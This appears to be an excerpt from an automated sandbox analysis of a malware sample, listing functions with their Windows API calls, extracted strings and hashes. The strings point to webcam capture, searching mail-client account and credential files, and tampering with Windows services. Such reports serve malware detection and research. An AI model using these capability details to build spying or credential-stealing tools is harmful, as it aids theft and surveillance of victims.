                                                                                                                                  Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                  • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prologSleep
                                                                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                  • API String ID: 3469354165-3054508432
                                                                                                                                  • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                                  • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                                  Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                  • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                  • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                  Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                  • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1922816806-0
                                                                                                                                  • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                  • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                  Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3594823470-0
                                                                                                                                  • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                  • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                  Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 493672254-0
                                                                                                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                  Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                  • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                  Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                  • _free.LIBCMT ref: 004482CC
                                                                                                                                  • _free.LIBCMT ref: 004482F4
                                                                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                  • _abort.LIBCMT ref: 00448313
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                  Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                  Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                  Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                  Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                  Function 100086E4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 2652629310-2459865102
                                                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                  Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                  Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                                                  • API String ID: 2877667751-2410386613
                                                                                                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                  Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
